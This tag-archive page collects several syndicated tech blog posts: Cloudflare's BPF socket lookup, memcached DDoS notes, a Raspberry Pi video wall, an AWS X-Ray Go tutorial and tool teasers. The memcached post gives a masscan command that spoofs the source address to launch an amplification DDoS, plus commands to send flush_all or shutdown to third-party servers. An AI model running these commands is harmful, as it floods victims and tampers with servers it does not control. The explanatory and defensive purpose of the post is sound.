Tag Archives: udp

It’s crowded in here!

Post Syndicated from Jakub Sitnicki original https://blog.cloudflare.com/its-crowded-in-here/

It's crowded in here!

We recently gave a presentation on Programming socket lookup with BPF at the Linux Plumbers Conference 2019 in Lisbon, Portugal. This blog post is a recap of the problem statement and proposed solution we presented.

It's crowded in here!
CC0 Public Domain, PxHere

Our edge servers are crowded. We run more than a dozen public facing services, leaving aside the all internal ones that do the work behind the scenes.

Quick Quiz #1: How many can you name? We blogged about them! Jump to answer.

These services are exposed on more than a million Anycast public IPv4 addresses partitioned into 100+ network prefixes.

To keep things uniform every Cloudflare edge server runs all services and responds to every Anycast address. This allows us to make efficient use of the hardware by load-balancing traffic between all machines. We have shared the details of Cloudflare edge architecture on the blog before.

It's crowded in here!

Granted not all services work on all the addresses but rather on a subset of them, covering one or several network prefixes.

So how do you set up your network services to listen on hundreds of IP addresses without driving the network stack over the edge?

Cloudflare engineers have had to ask themselves this question more than once over the years, and the answer has changed as our edge evolved. This evolution forced us to look for creative ways to work with the Berkeley sockets API, a POSIX standard for assigning a network address and a port number to your application. It has been quite a journey, and we are not done yet.

When life is simple – one address, one socket

It's crowded in here!

The simplest kind of association between an (IP address, port number) and a service that we can imagine is one-to-one. A server responds to client requests on a single address, on a well known port. To set it up the application has to open one socket for each transport protocol (be it TCP or UDP) it wants to support. A network server like our authoritative DNS would open up two sockets (one for UDP, one for TCP):

(192.0.2.1, 53/tcp) ⇨ ("auth-dns", pid=1001, fd=3)
(192.0.2.1, 53/udp) ⇨ ("auth-dns", pid=1001, fd=4)

To take it to Cloudflare scale, the service is likely to have to receive on at least a /20 network prefix, which is a range of IPs with 4096 addresses in it.

It's crowded in here!

This translates to opening 4096 sockets for each transport protocol. Something that is not likely to go unnoticed when looking at ss tool output.

$ sudo ss -ulpn 'sport = 53'
State  Recv-Q Send-Q  Local Address:Port Peer Address:Port
…
UNCONN 0      0           192.0.2.40:53        0.0.0.0:*    users:(("auth-dns",pid=77556,fd=11076))
UNCONN 0      0           192.0.2.39:53        0.0.0.0:*    users:(("auth-dns",pid=77556,fd=11075))
UNCONN 0      0           192.0.2.38:53        0.0.0.0:*    users:(("auth-dns",pid=77556,fd=11074))
UNCONN 0      0           192.0.2.37:53        0.0.0.0:*    users:(("auth-dns",pid=77556,fd=11073))
UNCONN 0      0           192.0.2.36:53        0.0.0.0:*    users:(("auth-dns",pid=77556,fd=11072))
UNCONN 0      0           192.0.2.31:53        0.0.0.0:*    users:(("auth-dns",pid=77556,fd=11071))
…

It's crowded in here!
CC BY 2.0, Luca Nebuloni, Flickr

The approach, while naive, has an advantage: when an IP from the range gets attacked with a UDP flood, the receive queues of sockets bound to the remaining IP addresses are not affected.

Life can be easier – all addresses, one socket

It's crowded in here!

It seems rather silly to create so many sockets for one service to receive traffic on a range of addresses. Not only that, the more listening sockets there are, the longer the chains in the socket lookup hash table. We have learned the hard way that going in this direction can hurt packet processing latency.

The sockets API comes with a big hammer that can make our life easier – the INADDR_ANY aka 0.0.0.0 wildcard address. With INADDR_ANY we can make a single socket receive on all addresses assigned to our host, specifying just the port.

s = socket(AF_INET, SOCK_STREAM, 0)
s.bind(('0.0.0.0', 12345))
s.listen(16)

Quick Quiz #2: Is there another way to bind a socket to all local addresses? Jump to answer.

In other words, compared to the naive “one address, one socket” approach, INADDR_ANY allows us to have a single catch-all listening socket for the whole IP range on which we accept incoming connections.

In Linux this is possible thanks to a two-phase listening socket lookup, where it falls back to search for an INADDR_ANY socket if a more specific match has not been found.

It's crowded in here!

Another upside of binding to 0.0.0.0 is that our application doesn’t need to be aware of what addresses we have assigned to our host. We are also free to assign or remove the addresses after binding the listening socket. No need to reconfigure the service when its listening IP range changes.

On the other hand if our service should be listening on just A.B.C.0/20 prefix, binding to all local addresses is more than we need. We might unintentionally expose an otherwise internal-only service to external traffic without a proper firewall or a socket filter in place.

Then there is the security angle. Since we now only have one socket, attacks attempting to flood any of the IPs assigned to our host on our service’s port, will hit the catch-all socket and its receive queue. While in such circumstances the Linux TCP stack has your back, UDP needs special care or legitimate traffic might drown in the flood of dropped packets.

Possibly the biggest downside, though, is that a service listening on the wildcard INADDR_ANY address claims the port number exclusively for itself. Binding over the wildcard-listening socket with a specific IP and port fails miserably due to the address already being taken (EADDRINUSE).

bind(3, {sa_family=AF_INET, sin_port=htons(12345), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
bind(4, {sa_family=AF_INET, sin_port=htons(12345), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 EADDRINUSE (Address already in use)

Unless your service is UDP-only, setting the SO_REUSEADDR socket option, will not help you overcome this restriction. The only way out is to turn to SO_REUSEPORT, normally used to construct a load-balancing socket group. And that is only if you are lucky enough to run the port-conflicting services as the same user (UID). That is a story for another post.

Quick Quiz #3: Does setting the SO_REUSEADDR socket option have any effect at all when there is bind conflict? Jump to answer.

Life gets real – one port, two services

As it happens, at the Cloudflare edge we do host services that share the same port number but otherwise respond to requests on non-overlapping IP ranges. A prominent example of such port-sharing is our 1.1.1.1 recursive DNS resolver running side-by-side with the authoritative DNS service that we offer to all customers.

Sadly the sockets API doesn’t allow us to express a setup in which two services share a port and accept requests on disjoint IP ranges.

However, as Linux development history shows, any networking API limitation can be overcome by introducing a new socket option, with sixty-something options available (and counting!).

Enter SO_BINDTOPREFIX.

It's crowded in here!

Back in 2016 we proposed an extension to the Linux network stack. It allowed services to constrain a wildcard-bound socket to an IP range belonging to a network prefix.

# Service 1, 127.0.0.0/20, 1234/tcp
net1, plen1 = '127.0.0.0', 20
bindprefix1 = struct.pack('BBBBBxxx', *inet_aton(net1), plen1)

s1 = socket(AF_INET, SOCK_STREAM, 0)
s1.setsockopt(SOL_IP, IP_BINDTOPREFIX, bindprefix1)
s1.bind(('0.0.0.0', 1234))
s1.listen(1)

# Service 2, 127.0.16.0/20, 1234/tcp
net2, plen2 = '127.0.16.0', 20
bindprefix2 = struct.pack('BBBBBxxx', *inet_aton(net2), plen2)

s2 = socket(AF_INET, SOCK_STREAM, 0)
s2.setsockopt(SOL_IP, IP_BINDTOPREFIX, bindprefix2)
s2.bind(('0.0.0.0', 1234))
s2.listen(1)

This mechanism has served us well since then. Unfortunately, it didn’t get accepted upstream due to being too specific to our use-case. Having no better alternative we ended up maintaining patches in our kernel to this day.

Life gets complicated – all ports, one service

Just when we thought we had things figured out, we were faced with a new challenge. How to build a service that accepts connections on any of the 65,535 ports? The ultimate reverse proxy, if you will, code named Spectrum.

The bind syscall offers very little flexibility when it comes to mapping a socket to a port number. You can either specify the number you want or let the network stack pick an unused one for you. There is no counterpart of INADDR_ANY, a wildcard value to select all ports (INPORT_ANY?).

To achieve what we wanted, we had to turn to TPROXY, a Netfilter / iptables extension designed for intercepting remote-destined traffic on the forward path. However, we use it to steer local-destined packets, that is ones targeted to our host, to a catch-all-ports socket.

iptables -t mangle -I PREROUTING \
         -d 192.0.2.0/24 -p tcp \
         -j TPROXY --on-ip=127.0.0.1 --on-port=1234

It's crowded in here!

TPROXY-based setup comes at a price. For starters, your service needs elevated privileges to create a special catch-all socket (see the IP_TRANSPARENT socket option). Then you also have to understand and consider the subtle interactions between TPROXY and the receive path for your traffic profile, for example:

  • does connection tracking register the flows redirected with TPROXY?
  • is listening socket contention during a SYN flood when using TPROXY a concern?
  • do other parts of the network stack, like XDP programs, need to know about TPROXY redirecting packets?

These are some of the questions we needed to answer, and after running it in production for a while now, we have a good idea of what the consequences of using TPROXY are.

That said, it would not come as a shock, if tomorrow we’d discovered something new about TPROXY. Due to its complexity we’ve always considered using it to steer local-destined traffic a hack, a use-case outside of its intended application. No matter how well understood, a hack remains a hack.

Can BPF make life easier?

Despite its complex nature TPROXY shows us something important. No matter what IP or port the listening socket is bound to, with a bit of support from the network stack, we can steer any connection to it. As long the application is ready to handle this situation, things work.

Quick Quiz #4: Are there really no problems with accepting any connection on any socket? Jump to answer.

This is a really powerful concept. With a bunch of TPROXY rules, we can configure any mapping between (address, port) tuples and listening sockets.

💡 Idea #1: A local-destined connection can be accepted by any listening socket.

We didn’t tell you the whole story before. When we published SO_BINDTOPREFIX patches, they did not just get rejected. As sometimes happens by posting the wrong answer, we got the right answer to our problem

❝BPF is absolutely the way to go here, as it allows for whatever user specified tweaks, like a list of destination subnetwork, or/and a list of source network, or the date/time of the day, or port knocking without netfilter, or … you name it.❞

💡 Idea #2: How we pick a listening socket can be tweaked with BPF.

Combine the two ideas together and we arrive at an exciting concept. Let’s run BPF code to match an incoming packet with a listening socket, ignoring the address the socket is bound to. 🤯

Here’s an example to illustrate it.

It's crowded in here!

All packets coming on 1.1.1.0/24 prefix, port 53 are steered to socket sk:2, while traffic targeted at 3.3.3.3, on any port number lands in socket sk:4.

Welcome BPF inet_lookup

It's crowded in here!

To make this concept a reality we are proposing a new mechanism to program the socket lookup with BPF. What is socket lookup? It’s a stage on the receive path where the transport layer searches for a socket to dispatch the packet to. The last possible moment to steer packets before they land in the selected socket receive queue. In there we attach a new type of BPF program called inet_lookup.

It's crowded in here!

If you recall, socket lookup in the Linux TCP stack is a two phase process. First the kernel will try to find an established (connected) socket matching the packet 4-tuple. If there isn’t one, it will continue by looking for a listening socket using just the packet 2-tuple as key.

Our proposed extension allows users to program the second phase, the listening socket lookup. If present, a BPF program is allowed to choose a listening socket and terminate the lookup. Our program is also free to ignore the packet, in which case the kernel will continue to look for a listening socket as usual.

It's crowded in here!

How does this new type of BPF program operate? On input, as context, it gets handed a subset of information extracted from packet headers, including the packet 4-tuple. Based on the input the program accesses a BPF map containing references to listening sockets, and selects one to yield as the socket lookup result.

If we take a look at the corresponding BPF code, the program structure resembles a firewall rule. We have some match statements followed by an action.

It's crowded in here!

You may notice that we don’t access the BPF map with sockets directly. Instead we follow an established pattern in BPF called “map based redirection”, where a dedicated BPF helper accesses the map and carries out any steps necessary to redirect the packet.

We’ve skipped over one thing. Where does the BPF map of sockets come from? We create it ourselves and populate it with sockets. This is most easily done if your service uses systemd socket activation. systemd will let you associate more than one service unit with a socket unit, and both of the services will receive a file descriptor for the same socket. From there it’s just a matter of inserting the socket into the BPF map.

It's crowded in here!

Demo time!

This is not just a concept. We have already published a first working set of patches for the kernel together with ancillary user-space tooling to configure the socket lookup to your needs.

If you would like to see it in action, you are in luck. We’ve put together a demo that shows just how easily you can bind a network service to (i) a single port, (ii) all ports, or (iii) a network prefix. On-the-fly, without having to restart the service! There is a port scan running to prove it.

You can also bind to all-addresses-all-ports (0.0.0.0/0) because why not? Take that INADDR_ANY. All thanks to BPF superpowers.

It's crowded in here!

Summary

We have gone over how the way we bind services to network addresses on the Cloudflare edge has evolved over time. Each approach has its pros and cons, summarized below. We are currently working on a new BPF-based mechanism for binding services to addresses, which is intended to address the shortcomings of existing solutions.

bind to one address and port

👍 flood traffic on one address hits one socket, doesn’t affect the rest
👎 as many sockets as listening addresses, doesn’t scale

bind to all addresses with INADDR_ANY

👍 just one socket for all addresses, the kernel thanks you
👍 application doesn’t need to know about listening addresses
👎 flood scenario requires custom protection, at least for UDP
👎 port sharing is tricky or impossible

bind to a network prefix with SO_BINDTOPREFIX

👍 two services can share a port if their IP ranges are non-overlapping
👎 custom kernel API extension that never went upstream

bind to all port with TPROXY

👍 enables redirecting all ports to a listening socket and more
👎 meant for intercepting forwarded traffic early on the ingress path
👎 has subtle interactions with the network stack
👎 requires privileges from the application

bind to anything you want with BPF inet_lookup

👍 allows for the same flexibility as with TPROXY or SO_BINDTOPREFIX
👍 services don’t need extra capabilities, meant for local traffic only
👎 needs cooperation from services or PID 1 to build a socket map


Getting to this point has been a team effort. A special thank you to Lorenz Bauer and Marek Majkowski who have contributed in an essential way to the BPF inet_lookup implementation. The SO_BINDTOPREFIX patches were authored by Gilberto Bertin.

Fancy joining the team? Apply here!

Quiz Answers

Quiz 1

Q: How many Cloudflare services can you name?

  1. HTTP CDN (tcp/80)
  2. HTTPS CDN (tcp/443, udp/443)
  3. authoritative DNS (udp/53)
  4. recursive DNS (udp/53, 853)
  5. NTP with NTS (udp/1234)
  6. Roughtime time service (udp/2002)
  7. IPFS Gateway (tcp/443)
  8. Ethereum Gateway (tcp/443)
  9. Spectrum proxy (tcp/any, udp/any)
  10. WARP (udp)

Go back

Quiz 2

Q: Is there another way to bind a socket to all local addresses?

Yes, there is – by not bind()’ing it at all. Calling listen() on an unbound socket is equivalent to binding it to INADDR_ANY and letting the kernel pick a free port.

$ strace -e socket,bind,listen nc -l
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
listen(3, 1)                            = 0
^Z
[1]+  Stopped                 strace -e socket,bind,listen nc -l
$ ss -4tlnp
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port
LISTEN     0      1            *:42669      

Go back

Quiz 3

Q: Does setting the SO_REUSEADDR socket option have any effect at all when there is bind conflict?

Yes. If two processes are racing to bind and listen on the same TCP port, on an overlapping IP, setting SO_REUSEADDR changes which syscall will report an error (EADDRINUSE). Without SO_REUSEADDR it will always be the second bind. With SO_REUSEADDR set there is a window of opportunity for a second bind to succeed but the subsequent listen to fail.

Go back

Quiz 4

Q: Are there really no problems with accepting any connection on any socket?

If the connection is destined for an address assigned to our host, i.e. a local address, there are no problems. However, for remote-destined connections, sending return traffic from a non-local address (i.e., one not present on any interface) will not get past the Linux network stack. The IP_TRANSPARENT socket option bypasses this protection mechanism known as source address check to lift this restriction.

Go back

Memcrashed – Memcached DDoS Exploit Tool

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/03/memcrashed-memcached-ddos-exploit-tool/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

Memcrashed – Memcached DDoS Exploit Tool

Memcrashed is a Memcached DDoS exploit tool written in Python that allows you to send forged UDP packets to a list of Memcached servers obtained from Shodan.

This is related to the recent record-breaking Memcached DDoS attacks that are likely to plague 2018 with over 100,000 vulnerable Memcached servers showing up in Shodan.

What is Memcached?

Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering.

Read the rest of Memcrashed – Memcached DDoS Exploit Tool now! Only available at Darknet.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced 0.0.0.0/0 with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on 127.0.0.1 end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

Spiegelbilder Studio’s giant CRT video walls

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/crt-video-walls/

After getting in contact with us to share their latest build with us, we invited Matvey Fridman of Germany-based production company Spiegelbilder Studio to write a guest blog post about their CRT video walls created for the band STRANDKØNZERT.

STRANDKØNZERT – TAGTRAUMER – OFFICIAL VIDEO

GERMAN DJENT RAP / EST. 2017. COMPLETE DIY-PROJECT.

CRT video wall

About a year ago, we had the idea of building a huge video wall out of old TVs to use in a music video. It took some time, but half a year later we found ourselves in a studio actually building this thing using 30 connected computers, 24 of which were Raspberry Pis.

STRANDKØNZERT CRT video wall Raspberry Pi

How we did it

After weeks and months of preproduction and testing, we decided on two consecutive days to build the wall, create the underlying IP network, run a few tests, and then film the artists’ performance in front of it. We actually had 32 Pis (a mixed bag of first, second, and third generation models) and even more TVs ready to go, since we didn’t know what the final build would actually look like. We ended up using 29 separate screens of various sizes hooked up to 24 separate Pis — the remaining five TVs got a daisy-chained video signal out of other monitors for a cool effect. Each Pi had to run a free software called PiWall.

STRANDKØNZERT CRT video wall Raspberry Pi

Since the TVs only had analogue video inputs, we had to get special composite breakout cables and then adapt the RCA connectors to either SCART, S-Video, or BNC.

STRANDKØNZERT CRT video wall Raspberry Pi

As soon as we had all of that running, we connected every Pi to a 48-port network switch that we’d hooked up to a Windows PC acting as a DHCP server to automatically assign IP addresses and handle the multicast addressing. To make remote control of the Raspberry Pis easier, a separate master Linux PC and two MacBook laptops, each with SSH enabled and a Samba server running, joined the network as well.

STRANDKØNZERT CRT video wall Raspberry Pi

The MacBook laptops were used to drop two files containing the settings on each Pi. The .pitile file was unique to every Pi and contained their respective IDs. The .piwall file contained the same info for all Pis: the measurements and positions of every single screen to help the software split up the video signal coming in through the network. After every Pi got the command to start the PiWall software, which specifies the UDP multicast address and settings to be used to receive the video stream, the master Linux PC was tasked with streaming the video file to these UDP addresses. Now every TV was showing its section of the video, and we could begin filming.

STRANDKØNZERT CRT video wall Raspberry Pi

The whole process and the contents of the files and commands are summarised in the infographic below. A lot of trial and error was involved in the making of this project, but it all worked out well in the end. We hope you enjoy the craft behind the music video even though the music is not for everybody 😉

PiWall_Infographic

You can follow Spiegelbilder Studio on Facebook, Twitter, and Instagram. And if you enjoyed the music video, be sure to follow STRANDKØNZERT too.

The post Spiegelbilder Studio’s giant CRT video walls appeared first on Raspberry Pi.

Instrumenting Web Apps Using AWS X-Ray

Post Syndicated from Bharath Kumar original https://aws.amazon.com/blogs/devops/instrumenting-web-apps-using-aws-x-ray/

This post was written by James Bowman, Software Development Engineer, AWS X-Ray

AWS X-Ray helps developers analyze and debug distributed applications and underlying services in production. You can identify and analyze root-causes of performance issues and errors, understand customer impact, and extract statistical aggregations (such as histograms) for optimization.

In this blog post, I will provide a step-by-step walkthrough for enabling X-Ray tracing in the Go programming language. You can use these steps to add X-Ray tracing to any distributed application.

Revel: A web framework for the Go language

This section will assist you with designing a guestbook application. Skip to “Instrumenting with AWS X-Ray” section below if you already have a Go language application.

Revel is a web framework for the Go language. It facilitates the rapid development of web applications by providing a predefined framework for controllers, views, routes, filters, and more.

To get started with Revel, run revel new github.com/jamesdbowman/guestbook. A project base is then copied to $GOPATH/src/github.com/jamesdbowman/guestbook.

$ tree -L 2
.
├── README.md
├── app
│ ├── controllers
│ ├── init.go
│ ├── routes
│ ├── tmp
│ └── views
├── conf
│ ├── app.conf
│ └── routes
├── messages
│ └── sample.en
├── public
│ ├── css
│ ├── fonts
│ ├── img
│ └── js
└── tests
└── apptest.go

Writing a guestbook application

A basic guestbook application can consist of just two routes: one to sign the guestbook and another to list all entries.
Let’s set up these routes by adding a Book controller, which can be routed to by modifying ./conf/routes.

./app/controllers/book.go:
package controllers

import (
    "math/rand"
    "time"

    "github.com/aws/aws-sdk-go/aws"
    "github.com/aws/aws-sdk-go/aws/endpoints"
    "github.com/aws/aws-sdk-go/aws/session"
    "github.com/aws/aws-sdk-go/service/dynamodb"
    "github.com/aws/aws-sdk-go/service/dynamodb/dynamodbattribute"
    "github.com/revel/revel"
)

const TABLE_NAME = "guestbook"
const SUCCESS = "Success.\n"
const DAY = 86400

var letters = []rune("ABCDEFGHIJKLMNOPQRSTUVWXYZ")

func init() {
    rand.Seed(time.Now().UnixNano())
}

// randString returns a random string of len n, used for DynamoDB Hash key.
func randString(n int) string {
    b := make([]rune, n)
    for i := range b {
        b[i] = letters[rand.Intn(len(letters))]
    }
    return string(b)
}

// Book controls interactions with the guestbook.
type Book struct {
    *revel.Controller
    ddbClient *dynamodb.DynamoDB
}

// Signature represents a user's signature.
type Signature struct {
    Message string
    Epoch   int64
    ID      string
}

// ddb returns the controller's DynamoDB client, instatiating a new client if necessary.
func (c Book) ddb() *dynamodb.DynamoDB {
    if c.ddbClient == nil {
        sess := session.Must(session.NewSession(&aws.Config{
            Region: aws.String(endpoints.UsWest2RegionID),
        }))
        c.ddbClient = dynamodb.New(sess)
    }
    return c.ddbClient
}

// Sign allows users to sign the book.
// The message is to be passed as application/json typed content, listed under the "message" top level key.
func (c Book) Sign() revel.Result {
    var s Signature

    err := c.Params.BindJSON(&s)
    if err != nil {
        return c.RenderError(err)
    }
    now := time.Now()
    s.Epoch = now.Unix()
    s.ID = randString(20)

    item, err := dynamodbattribute.MarshalMap(s)
    if err != nil {
        return c.RenderError(err)
    }

    putItemInput := &dynamodb.PutItemInput{
        TableName: aws.String(TABLE_NAME),
        Item:      item,
    }
    _, err = c.ddb().PutItem(putItemInput)
    if err != nil {
        return c.RenderError(err)
    }

    return c.RenderText(SUCCESS)
}

// List allows users to list all signatures in the book.
func (c Book) List() revel.Result {
    scanInput := &dynamodb.ScanInput{
        TableName: aws.String(TABLE_NAME),
        Limit:     aws.Int64(100),
    }
    res, err := c.ddb().Scan(scanInput)
    if err != nil {
        return c.RenderError(err)
    }

    messages := make([]string, 0)
    for _, v := range res.Items {
        messages = append(messages, *(v["Message"].S))
    }
    return c.RenderJSON(messages)
}

./conf/routes:
POST /sign Book.Sign
GET /list Book.List

Creating the resources and testing

For the purposes of this blog post, the application will be run and tested locally. We will store and retrieve messages from an Amazon DynamoDB table. Use the following AWS CLI command to create the guestbook table:

aws dynamodb create-table --region us-west-2 --table-name "guestbook" --attribute-definitions AttributeName=ID,AttributeType=S AttributeName=Epoch,AttributeType=N --key-schema AttributeName=ID,KeyType=HASH AttributeName=Epoch,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5

Now, let’s test our sign and list routes. If everything is working correctly, the following result appears:

$ curl -d '{"message":"Hello from cURL!"}' -H "Content-Type: application/json" http://localhost:9000/book/sign
Success.
$ curl http://localhost:9000/book/list
[
  "Hello from cURL!"
]%

Integrating with AWS X-Ray

Download and run the AWS X-Ray daemon

The AWS SDKs emit trace segments over UDP on port 2000. (This port can be configured.) In order for the trace segments to make it to the X-Ray service, the daemon must listen on this port and batch the segments in calls to the PutTraceSegments API.
For information about downloading and running the X-Ray daemon, see the AWS X-Ray Developer Guide.

Installing the AWS X-Ray SDK for Go

To download the SDK from GitHub, run go get -u github.com/aws/aws-xray-sdk-go/... The SDK will appear in the $GOPATH.

Enabling the incoming request filter

The first step to instrumenting an application with AWS X-Ray is to enable the generation of trace segments on incoming requests. The SDK conveniently provides an implementation of http.Handler which does exactly that. To ensure incoming web requests travel through this handler, we can modify app/init.go, adding a custom function to be run on application start.

import (
    "github.com/aws/aws-xray-sdk-go/xray"
    "github.com/revel/revel"
)

...

func init() {
  ...
    revel.OnAppStart(installXRayHandler)
}

func installXRayHandler() {
    revel.Server.Handler = xray.Handler(xray.NewFixedSegmentNamer("GuestbookApp"), revel.Server.Handler)
}

The application will now emit a segment for each incoming web request. The service graph appears:

You can customize the name of the segment to make it more descriptive by providing an alternate implementation of SegmentNamer to xray.Handler. For example, you can use xray.NewDynamicSegmentNamer(fallback, pattern) in place of the fixed namer. This namer will use the host name from the incoming web request (if it matches pattern) as the segment name. This is often useful when you are trying to separate different instances of the same application.

In addition, HTTP-centric information such as method and URL is collected in the segment’s http subsection:

"http": {
    "request": {
        "url": "/book/list",
        "method": "GET",
        "user_agent": "curl/7.54.0",
        "client_ip": "::1"
    },
    "response": {
        "status": 200
    }
},

Instrumenting outbound calls

To provide detailed performance metrics for distributed applications, the AWS X-Ray SDK needs to measure the time it takes to make outbound requests. Trace context is passed to downstream services using the X-Amzn-Trace-Id header. To draw a detailed and accurate representation of a distributed application, outbound call instrumentation is required.

AWS SDK calls

The AWS X-Ray SDK for Go provides a one-line AWS client wrapper that enables the collection of detailed per-call metrics for any AWS client. We can modify the DynamoDB client instantiation to include this line:

// ddb returns the controller's DynamoDB client, instatiating a new client if necessary.
func (c Book) ddb() *dynamodb.DynamoDB {
    if c.ddbClient == nil {
        sess := session.Must(session.NewSession(&aws.Config{
            Region: aws.String(endpoints.UsWest2RegionID),
        }))
        c.ddbClient = dynamodb.New(sess)
        xray.AWS(c.ddbClient.Client) // add subsegment-generating X-Ray handlers to this client
    }
    return c.ddbClient
}

We also need to ensure that the segment generated by our xray.Handler is passed to these AWS calls so that the X-Ray SDK knows to which segment these generated subsegments belong. In Go, the context.Context object is passed throughout the call path to achieve this goal. (In most other languages, some variant of ThreadLocal is used.) AWS clients provide a *WithContext method variant for each AWS operation, which we need to switch to:

_, err = c.ddb().PutItemWithContext(c.Request.Context(), putItemInput)
    res, err := c.ddb().ScanWithContext(c.Request.Context(), scanInput)

We now see much more detail in the Timeline view of the trace for the sign and list operations:

We can use this detail to help diagnose throttling on our DynamoDB table. In the following screenshot, the purple in the DynamoDB service graph node indicates that our table is underprovisioned. The red in the GuestbookApp node indicates that the application is throwing faults due to this throttling.

HTTP calls

Although the guestbook application does not make any non-AWS outbound HTTP calls in its current state, there is a similar one-liner to wrap HTTP clients that make outbound requests. xray.Client(c *http.Client) wraps an existing http.Client (or nil if you want to use a default HTTP client). For example:

resp, err := ctxhttp.Get(ctx, xray.Client(nil), "https://aws.amazon.com/")

Instrumenting local operations

X-Ray can also assist in measuring the performance of local compute operations. To see this in action, let’s create a custom subsegment inside the randString method:


// randString returns a random string of len n, used for DynamoDB Hash key.
func randString(ctx context.Context, n int) string {
    xray.Capture(ctx, "randString", func(innerCtx context.Context) {
        b := make([]rune, n)
        for i := range b {
            b[i] = letters[rand.Intn(len(letters))]
        }
        s := string(b)
    })
    return s
}

// we'll also need to change the callsite

s.ID = randString(c.Request.Context(), 20)

Summary

By now, you are an expert on how to instrument X-Ray for your Go applications. Instrumenting X-Ray with your applications is an easy way to analyze and debug performance issues and understand customer impact. Please feel free to give any feedback or comments below.

For more information about advanced configuration of the AWS X-Ray SDK for Go, see the AWS X-Ray SDK for Go in the AWS X-Ray Developer Guide and the aws/aws-xray-sdk-go GitHub repository.

For more information about some of the advanced X-Ray features such as histograms, annotations, and filter expressions, see the Analyzing Performance for Amazon Rekognition Apps Written on AWS Lambda Using AWS X-Ray blog post.

nbtscan Download – NetBIOS Scanner For Windows & Linux

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/09/nbtscan-download-netbios-scanner-for-windows-linux/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

nbtscan Download – NetBIOS Scanner For Windows & Linux

